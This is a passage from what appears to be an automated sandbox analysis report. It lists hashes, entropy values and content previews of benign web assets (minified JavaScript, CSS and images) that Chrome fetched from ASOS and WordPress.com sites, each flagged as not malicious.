                                                                                                                                                                                                                                                                  Preview:(()=>{var e,t,r={40591:(e,t,r)=>{"use strict";var n={};r.r(n),r.d(n,{fetchClientNavigation:()=>ln,fetchCountry:()=>gn,fetchDefaultDeliveryCountry:()=>bn,fetchNavigation:()=>un,fetchPaymentProviders:()=>yn,fetchSitecoreBearerToken:()=>Sn,fetchSocialTags:()=>vn,fetchSuggestions:()=>hn,fetchTargetedContent:()=>jn,fetchTemplateFromBlobStorage:()=>xn,fetchWelcomeMessage:()=>On,getDeliveryOptions:()=>wn,sendEventToAlfred:()=>Cn});var o=r(31542);const i="asos",a="siteChrome",c="sdk",l="subscriptions",d="audience",u="_versionManifest",p="_initialStore",m="_initialBreadcrumbs",h="_tokenValues",g="_config",y="CLIENT_",f="bag",b="stc-welcome-message",v="userTookActionOnWelcomeMessage",w="resolvedDeliveryCountry",O="cappedPageCount",j="localStorageCacheError",S=(e,t)=>{const r=[];for(let n=0;n<localStorage.length;n++){const s=localStorage.key(n);s!==t&&s.startsWith(e)&&r.push(s)}r.forEach((e=>localStorage.removeItem(e)))},x=async function(e){const{cacheKeyPrefix:t,returnCachedOnDelegateFailure:r,r
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (738)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1404
                                                                                                                                                                                                                                                                  Entropy (8bit):5.279285019364911
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:pJdHfQXS14ok4cr0cVpZSl4LbOWnJdHf/XA179y6myHuo17NMyPaJEMn:Ld/qeJi4l4xd/fs79SZo17SOaJEMn
                                                                                                                                                                                                                                                                  MD5:D86CE772A6BB358B9987EA88D23B60C8
                                                                                                                                                                                                                                                                  SHA1:1325F6E39579E11284D520185A891C56B6DC3EA9
                                                                                                                                                                                                                                                                  SHA-256:38D3C4B3A6A06E51F13533948D0400423C37C53DDA699A697F15542B8F946D7B
                                                                                                                                                                                                                                                                  SHA-512:C00DB8C439C6C1EC6111A48D6FAFA282C2CE077EDC57056697FEDE0272FBAC97A89C660FD09288216F516B3311FC9E184B9F0456FFCF0BC656238561718FE955
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/vendors.7066a9f385c04a3ae6f5.css
                                                                                                                                                                                                                                                                  Preview:/*! license: https://assets.asosservices.com/fonts/futura-pt/LICENSE.txt */@font-face{font-display:swap;font-family:futura-pt;font-style:italic;font-weight:400;src:url(https://assets.asosservices.com/fonts/futura-pt/creative.1fc777b4.woff2) format("woff2")}.FwJXaFp{font-size:18px;letter-spacing:.6px;line-height:24px}.FwJXaFp,.LjNswYi{font-style:italic;font-weight:400}.LjNswYi{font-size:16px;letter-spacing:.4px;line-height:22px}.OHZ3yTe{font-size:14px;letter-spacing:.6px;line-height:20px}.OHZ3yTe,.xREtrYC{font-style:italic;font-weight:400}.xREtrYC{font-size:12px;letter-spacing:.8px;line-height:16px}./*! license: https://assets.asosservices.com/fonts/futura-pt/LICENSE.txt */@font-face{font-display:swap;font-family:futura-pt;font-style:italic;font-weight:700;src:url(https://assets.asosservices.com/fonts/futura-pt/creativeBold.1f9423cd.woff2) format("woff2")}.KKDrHgP{font-size:60px;font-style:italic;font-weight:700;letter-spacing:2px;line-height:60px;text-transform:uppercase}.L5UuMxq{font-
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):600
                                                                                                                                                                                                                                                                  Entropy (8bit):7.391634169810707
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                                                                                                                                                                                                                                                  MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                                                                                                                                                                  SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                                                                                                                                                                  SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                                                                                                                                                                  SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8426), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):8426
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1292117818572525
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:Vq91cVg7pLtvMFO90lpyylSXV2XOlvFwXLlyjFxO/sR4KZsGdocVwh3bBitzhb:VqcVg7pLtvMFO90lpyylSXV2X2twX5Kb
                                                                                                                                                                                                                                                                  MD5:F466CB6B256973317C2315741FAD9F49
                                                                                                                                                                                                                                                                  SHA1:EA2C62047A1697C19B06BE23871CA839849CB8A3
                                                                                                                                                                                                                                                                  SHA-256:A6DC271CBDAA05E97C5144483628DF9E30B68326E5B04A5FEF3322AF1C0F22E0
                                                                                                                                                                                                                                                                  SHA-512:85DE6B5F1DF04A2D70C2E3843AEE63BF0BA46BA770FF1D26550C471B689627449AB943CF5F55C8123B0D7A6BA390C336308865116C7A907DEF2494FCBC853D57
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s0.wp.com/wp-content/mu-plugins/actionbar/actionbar.js?v=20231122
                                                                                                                                                                                                                                                                  Preview:(function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},n=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","X-Requested-With":"XMLHttpRequest"}}).then(n)}let o;function c(){if(!o){o=new Promise((e,n)=>{if(window.WPCOM_Proxy_Request){e(window.WPCOM_Proxy_Request)}else{const o=document.createElement("script");o.src=t.proxyScriptUrl;o.async=true;document.body.appendChild(o);o.addEventListener("load",()=>e(window.WPCOM_Proxy_Request));o.addEventListener("error",e=>n(e))}})}return o}function s(e,t,n={}){const o={path:e,body:n,method:"POST",apiNamespace:t};c().then(e=>e(o))}function i(e,t){n({action:"actionbar_stats",stat:e},t)}function r(e){n({action:e,_wpnonce:t.nonce,source:"actionbar",blog_id:t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelec
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1237
                                                                                                                                                                                                                                                                  Entropy (8bit):4.529756812811964
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:t4178BtFtOtvxeT09GIvDvrcRnaP8OYEdXKceGS+DX057ABm9mX84p2eT4:CIBtFAtvxx2RZOYEdPeGS6X05km9gvR4
                                                                                                                                                                                                                                                                  MD5:8B80CE17A35BC980EDBCA32704FF6D4B
                                                                                                                                                                                                                                                                  SHA1:A0844CB982A1091BE97A175F6A353FFDDF92A597
                                                                                                                                                                                                                                                                  SHA-256:83431FA4D894678730F7EA8D0FA1CDE613EC26BD059031BFF95530C5D70A1F10
                                                                                                                                                                                                                                                                  SHA-512:9494E260B4C0C0EC3982621E9888ED74ED5FA778181F9FF7A15E69A7DA66E5747F4CD7A803F2EB0DDE8E48EA77FF4632BA3200B2385A43996D91144952FD8C39
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s0.wp.com/wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg
                                                                                                                                                                                                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 812 812.02" fill="#101517"><title>wordpressdotcom-mark-black</title><g id="Layer_2" data-name="Layer 2"><g id="Black_W" data-name="Black W"><path d="M406,0C182.13,0,0,182.13,0,406S182.13,812,406,812,812,629.88,812,406,629.86,0,406,0ZM41,406A363.54,363.54,0,0,1,72.59,257.43L246.71,734.51C124.93,675.35,41,550.48,41,406ZM406,771.06a365.51,365.51,0,0,1-103.12-14.87L412.41,437.92,524.6,745.33a34.54,34.54,0,0,0,2.62,5A364.46,364.46,0,0,1,406,771.06Zm50.3-536.22c22-1.15,41.78-3.46,41.78-3.46,19.67-2.33,17.35-31.24-2.32-30.08,0,0-59.13,4.64-97.3,4.64-35.87,0-96.13-4.64-96.13-4.64-19.69-1.16-22,28.91-2.32,30.08,0,0,18.62,2.31,38.29,3.46l56.86,155.82-79.9,239.58L182.35,234.84c22-1.15,41.77-3.46,41.77-3.46,19.67-2.33,17.34-31.24-2.33-30.08,0,0-59.12,4.64-97.28,4.64-6.85,0-14.93-.18-23.51-.45C166.28,106.4,278.47,41,406,41a363.61,363.61,0,0,1,246.49,95.84c-1.56-.11-3.1-.3-4.72-.3-35.86,0-61.3,31.23-61.3,64.79,0,30.08,17.35,55.52,35.86,85.61,13.87
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):295269
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287607195979462
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:J+uj2nY5JFTHuxxtRrE3utRFtROpITQiyHCDLFcB4lf2+XQ:dNzITQiyHCDLGB4lf28Q
                                                                                                                                                                                                                                                                  MD5:ABDBABD2F2E147F7C92858569FC95BE9
                                                                                                                                                                                                                                                                  SHA1:1D981E9CC072BC9D0F6091DED25D4C9BCCD7535A
                                                                                                                                                                                                                                                                  SHA-256:C337D001B48BCC81F20ABA396A11C291491ED9DB78845E9F98D07985379E1CB9
                                                                                                                                                                                                                                                                  SHA-512:80C1EA0B58CE9DCB284FF8D6A4C6B6AF510AF77A787DFF07E2B3D23BBDA6D09CE6754DBD6F3D10E84223B73E4552D0C4547DE89CB6DD591FD87CAEA7E9D8B3F5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/assets/uilib/content-ui-library-5.0.0-c2f7f9fe-40.css
                                                                                                                                                                                                                                                                  Preview:.videoClickToPlay-controlsWrapper .videoClickToPlay-controls__toggle--fullScreen{background-image:url("data:image/svg+xml;charset%3DUS-ASCII,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3Csvg%20width%3D%2240px%22%20height%3D%2240px%22%20viewBox%3D%220%200%2040%2040%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%20%20%20%20%20%20%20%20%3Ctitle%3Eicon_full_screen%3C%2Ftitle%3E%20%20%20%20%3Cdesc%3ECreated%20with%20Sketch.%3C%2Fdesc%3E%20%20%20%20%3Cdefs%3E%3C%2Fdefs%3E%20%20%20%20%3Cg%20id%3D%22Spec---updates-based-on-dev-feedback%22%20stroke%3D%22none%22%20stroke-width%3D%221%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%20%20%20%20%20%20%20%20%3Cg%20id%3D%22Video-Click-to-play%22%20transform%3D%22translate%28-759.000000%2C%20-6143.000000%29%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%3Cg%20id%3D%22icon_full_screen%22%20transform%3D%22translate%28755.000000%2C%206139.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5000
                                                                                                                                                                                                                                                                  Entropy (8bit):7.953749053207191
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:DW8NGbKMVL4GD+NErN6yjWMwgTHmL7Y0b8JN/opm4+h6xhcVLlwKSPR12p:DWIMVL9D73JIHb4opmt6f2Lm51I
                                                                                                                                                                                                                                                                  MD5:3E5F5806E1B496D0A85BF8D15CB3AB00
                                                                                                                                                                                                                                                                  SHA1:70D14CD37829384584C4A1114D8A2C244795E709
                                                                                                                                                                                                                                                                  SHA-256:7C9F22AE56B4C78410EEA799E85D1E2CFD46330C55F8C629D5E412852982A295
                                                                                                                                                                                                                                                                  SHA-512:A7646B40CAB91EA57206FFDA97AE61656D13DD549776F1E8ACE8F346E511A6969E4A9AC974B8D7570E3B3D81A959DE8F3AB78C36F4B2430E397D762B67CFFFA3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/es.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........BIDATx...|T......{&.L..cB....)P...V.).......g........G}t.U..j..h-U....~D-..Q^..(.T !1/&..$.~.{......L.'.;w.>..{......#.4...o.#4%.."...$.,...$dZ.lN.../B.k...b..b5/&..6..K....fL5..{v..0..bHN..A..N...?7A\.......-.K.A%~ ..!..`../..~H.eY....F./.1$.....".v.8.K.A..G...uLY...:...9.Vt./...9.z5.o...._..i<.7X.../.n.F.n..r...R.B.Y...A.F.,C$.F..(-..C....9(.i....O.zp.O....p/.t....>.-.......}.B..>H 7.X(..fK.4..!......RT..@...b.9.lmd...o..=_... .IP..Jr..../..U+NU.N....?...g._..cp...B....$kt..I.ay........o...D..Z.[B...v....A_z...;.-......&.....kQ.v..O..Ik.....!.x7..=......(...Q.E.}$K.t.^..]..7v2.>)mWcB^#.+.......F.x(Kw....4.G.0.2..:Q.N..*L*mD.=*......*..p.J.\.$..o.,......rB..aR...5T....|.RD9..f...|....zx...9WaO.@.9`.ly..nfx\.fx.*..H=..0...`.6PK.P.K...{*..a......ub.`..E...1....h...}..m.[..H..cX'.U.#..:...K.q.rQ..-...m.aKT.:...;..c:1.$7#...TJ.f.F....;Gg'.!7....*l.. W.Dt..0..<..y..u.c....n....4.h..fa..2<.a.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (311), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):311
                                                                                                                                                                                                                                                                  Entropy (8bit):4.72847055445287
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:3lqX2P76T2Y33LDb+G8QcKRakoenGWKuzJGAyFMVUft3ACUZ0UBRj/A8:3DOTLb+GMKRakrGqNXyFFfoZrRj/T
                                                                                                                                                                                                                                                                  MD5:D29C41F4A6C13F38C2BDEB009C5DCF09
                                                                                                                                                                                                                                                                  SHA1:3F3DB604BACF02B91AAA59CF223990B727600045
                                                                                                                                                                                                                                                                  SHA-256:947D703F577549CBB0B1A4143F3B363EC9C7CF309587D5B12B87F0E64FF99DB4
                                                                                                                                                                                                                                                                  SHA-512:215B4171F03FF0530FBE7114B6A6489B2AA93B2C395481A574F81EF8C65AF5047F9855AB9E5D3E69885BFB24DA30F4D2F784597795B585469889354F94A6CD0B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s2.wp.com/wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes
                                                                                                                                                                                                                                                                  Preview:img.latex{border:0;vertical-align:middle}.video-player{border:0;margin:auto;padding:5px;text-align:center;max-width:100%}.hidden{display:none}.screen-reader-text{position:absolute;left:-1000em}.comment object,.comment embed,.embed-vimeo iframe,.embed-youtube iframe{max-width:100%}.simple-homepage{display:none}
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4206
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9017967994114535
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yEJxog9X3l4Mk2ux6Clf5Jd3ohenPZGkm0oAOr27:y8xoK3p9u6Clf5X3keBvOry
                                                                                                                                                                                                                                                                  MD5:E9EE5AD25C6928A55574A42A3CE1FA01
                                                                                                                                                                                                                                                                  SHA1:00C9BC8C1DE93D4279CB25631F89E5D7B04480D7
                                                                                                                                                                                                                                                                  SHA-256:019EDFCFE79125D1CF41AE3AB7A269DAAE1E756EC27F375CB235EA1C49B0929A
                                                                                                                                                                                                                                                                  SHA-512:E417CEC635A95390D263EDB0DEB48E36BBFA83A917EAB70D31D22E29698EB0F9B9B6165D2474E90C15FE7106119D47D1611C2E343D016F704976F6F63EF3A77C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1.M..@$..V5Y.6.......M.DO<..*...+.?*..q.P.&T....t.$.5..I8..2..>7.9$...-c..|.FO.... ..c,.n.9....n..$vo....^h..(.....N1....ev..e.3....H....V\0..@...+.M....9;.-.e..7..f.;FH.......[..nF8.=.I,.....Q>\..r..u...n.i..M.....Fr~......>...M6.-.d.....K8.:p+..es...}..........x@...z.N...w.h.Qe.\....}.2..T.3 ...n..y..3.aR*pi...5.....Y.iV..q.7pC).H./..(....... .8..<M..R{
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3891
                                                                                                                                                                                                                                                                  Entropy (8bit):7.895169935107539
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:IvmuERAvMtleG1KE6WBi93/Cl2y/Tppho7+zn87Bw3BMDAHvqQ4o1uz7qI1a:yESMQOY9PupphTz0BQPb4wy3c
                                                                                                                                                                                                                                                                  MD5:C82C26090F319798C7BDB14A510E2CA7
                                                                                                                                                                                                                                                                  SHA1:0C4A68834FA028B655347D9A49EA8AD243E6DDDF
                                                                                                                                                                                                                                                                  SHA-256:491B43BD2483473FDF6C8F0B5A399D5CA88DA154C4DD576BB01C4FCC50BFB12A
                                                                                                                                                                                                                                                                  SHA-512:8C7CBE60BDB4DEE4E9E7D855AF1CDB46B243916100976046F73E558391B6654B88C511D7E82D74F8A9E1B2A921B4697835A981E0531706381FE0C698191C8946
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5VkcAf__VfTECYjxR1zEjzEeUqVCOpmy-ToMC2oDpihFBDApkF8YSBcGEFkDfjNL2dpJ0UkZxupvRNtyeNT3I-AyHNENAwb2_-DZOzGTlUQhzKcFMf65SiWoFSAE7eERvRg56uYB2WYqJiFCyof5l6Ujg7_TfkOu8WyD8wBDc7sMz5db5AsNDucIwFkZC3Wv7YQcOYnOMgB2ZRVWzf__aR6mJjrA&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=3b23377149f960fd
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...|@...=8K&...0....V'....^.j.=.3.m-....1...q.k.[./m.RXm..R.I...,O^..._.....5.Z....8.h.......)....Ts...u...:M.KW...2%....2....cS..>."...g....{k.Rh\mdu..](....f......}.\.V.(......,$@x.0F>.....3F..e......^..@.t.o.F..;..e..\.g...].8...rx........k:V......%.;..2.9b.....;.(6......oxR....[.-f{..!e3%.S..I.9R..Nq..{...m7M....C.5.K.....p@.e.......\.z.....}.....
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                                  MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                                  SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                                  SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                                  SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://pixel.wp.com/g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoODFFSDFKMmdBdysuWmJ6fkpUJXxZPVlCQm1qNSxSYkxYZXV0d1ZYLjE1aVdvYUNlcHlGVl0vNXF%2BVEw2QmdPMUg9NjdbdU05bi4%2FZnomWzdTdHwyV3RtM25VTEE0Sm50bFozWEt5VWJ5UDU4Nk1NQ0E1R3A4VityWnxrYS80QUtiWTkuXXc1NnN5RGtkNGpCY2I9TyxuTFNJXW5FWGtVLEMxK0h%2BLndnQnc%3D&v=wpcom-no-pv&rand=0.16543343148914724
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3323)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3612
                                                                                                                                                                                                                                                                  Entropy (8bit):4.794752117851486
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:bVf7l4MaSrDLZRsPQ3tLSqLMXnOpHrpqtPgnR7a5oT6:bMMaSrHBYe1ng1
                                                                                                                                                                                                                                                                  MD5:DF96BE962CD71015A6133F236AD6197A
                                                                                                                                                                                                                                                                  SHA1:ED042F69FC87A470ECA665D11DB4885D15D11D65
                                                                                                                                                                                                                                                                  SHA-256:8380B28A36E999536835287BFDE7868608C79DA6A9935F2C0B091DF4CD393001
                                                                                                                                                                                                                                                                  SHA-512:4C1A53D7DF8AE54C036DE67FD7448B34F54359DD25BA49BD75656B0DB000F56891837B423023FB08D17BBB22533723097F26AECD9429DADD315ACD19AC9686BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://0.gravatar.com/js/hovercards/hovercards.min.css?ver=202444448e29c9ec460f70535c7958cd60e9e2980f935c5309d61d08f40d080a876779
                                                                                                                                                                                                                                                                  Preview:.gravatar-hovercard{display:inline-block;z-index:10000000}.gravatar-hovercard h4,.gravatar-hovercard p{margin:0}.gravatar-hovercard a,.gravatar-hovercard i,.gravatar-hovercard p{color:#000;font-family:SF Pro Text,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:14px;line-height:1.5}.gravatar-hovercard .gravatar-hovercard__inner{background-color:#fff;border:1px solid #d8dbdd;border-radius:4px;box-shadow:0 2px 6px rgba(0,0,0,.08);box-sizing:border-box;display:flex;flex-direction:column;height:213px;justify-content:space-between;padding:24px 24px 16px;width:400px}.gravatar-hovercard .gravatar-hovercard__header{align-items:center;display:flex;gap:10px}.gravatar-hovercard .gravatar-hovercard__avatar-link,.gravatar-hovercard .gravatar-hovercard__social-link{display:inline-flex}.gravatar-hovercard .gravatar-hovercard__avatar{background-color:#eee;border-radius:50%}.gravatar-hovercard .gravatar-hovercard__personal-info-link{text-
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6113), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6113
                                                                                                                                                                                                                                                                  Entropy (8bit):5.310396655001161
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:i9bTjbFak4+lRjSPntzo5EmOSLV9wV5OlvCFOnii0Oul70sD3Qh63M3s/:BtgERj0sDhEg
                                                                                                                                                                                                                                                                  MD5:84D47CA1D55A2794BA71A628BA44C72A
                                                                                                                                                                                                                                                                  SHA1:CA68D49F59FE61BDCAA585AD3444D29ACFC6A520
                                                                                                                                                                                                                                                                  SHA-256:3DDB970BEACA133988D2C7D9DA6883C3B81A5F5635C2A5B72EBF64438058D1C2
                                                                                                                                                                                                                                                                  SHA-512:B822A50A59564B992E1FE8BD364D2985D806D89A39E289BEF45628F5FC2E02682C4C358001871EC472565153C4A0B1BC55D58BC7D7A258F267F310CD18B687D6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function(e){var i={PLATFORM_WINDOWS:"windows",PLATFORM_IPHONE:"iphone",PLATFORM_IPOD:"ipod",PLATFORM_IPAD:"ipad",PLATFORM_BLACKBERRY:"blackberry",PLATFORM_BLACKBERRY_10:"blackberry_10",PLATFORM_SYMBIAN:"symbian_series60",PLATFORM_SYMBIAN_S40:"symbian_series40",PLATFORM_J2ME_MIDP:"j2me_midp",PLATFORM_ANDROID:"android",PLATFORM_ANDROID_TABLET:"android_tablet",PLATFORM_FIREFOX_OS:"firefoxOS",PLATFORM_MOBILE_GENERIC:"mobile_generic",userAgent:false,matchedPlatformName:false,matchedUserAgentName:false,init:function(){try{i.userAgent=e.navigator.userAgent.toLowerCase();i.getPlatformName();i.getMobileUserAgentName()}catch(e){console.error(e)}},initForTest:function(e){i.matchedPlatformName=false;i.matchedUserAgentName=false;try{i.userAgent=e.toLowerCase();i.getPlatformName();i.getMobileUserAgentName()}catch(e){console.error(e)}},getMobileUserAgentName:function(){if(i.matchedUserAgentName!==false)return i.matchedUserAgentName;if(i.userAgent===false)return false;if(i.isChromeForIOS())i.matchedU
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                                                  Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                  Encrypted:false
